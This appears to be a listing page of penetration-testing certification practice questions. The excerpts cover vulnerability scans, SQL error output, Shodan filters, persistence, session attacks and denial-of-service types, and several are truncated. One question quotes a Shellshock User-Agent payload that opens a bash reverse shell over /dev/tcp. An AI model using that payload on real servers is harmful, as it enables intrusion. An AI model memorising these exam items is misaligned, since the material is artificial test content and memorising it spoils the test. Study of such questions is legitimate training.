Which of the following would be a recommendation for remediation?

02/11/2022 – by Mod_GuideK 0

A penetration tester conducted a vulnerability scan against a client’s critical servers and found the following: Which of the following would be a recommendation for remediation? A. Deploy a user training program B. Implement a patch management plan C. Utilize…

Which of the following commands can be used to further attack the website?

02/11/2022 – by Mod_GuideK 0

A tester who is performing a penetration test on a website receives the following output: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further…

Which of the following settings in Shodan would meet the client’s requirements?

02/11/2022 – by Mod_GuideK 0

A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the…

Which of the following can be used to ensure the tester is able to maintain access to the system?

02/11/2022 – by Mod_GuideK 0

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop. Which of the following can be used to ensure the tester is able to maintain access to the system? A. schtasks /create…

Which of the following would be the BEST to use to find vulnerabilities on this server?

02/11/2022 – by Mod_GuideK 0

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company’s privacy policy. Which of the following would be the BEST…

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

02/11/2022 – by Mod_GuideK 0

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in? A. HTTPS communication B. Public and private keys C. Password encryption D. Sessions and cookies

Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

02/11/2022 – by Mod_GuideK 0

Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations? A. NIST SP 800-53 B. OWASP Top 10 C. MITRE ATT&CK framework D. PTES technical guidelines

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

02/11/2022 – by Mod_GuideK 0

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {“User-Agent”: “() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which…

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

02/11/2022 – by Mod_GuideK 1

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff? A. A quick description of the vulnerability and a high-level…

Which of the following could be used for a denial-of-service attack on the network segment?

02/11/2022 – by Mod_GuideK 0

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment? A. Smurf B. Ping flood C. Fraggle…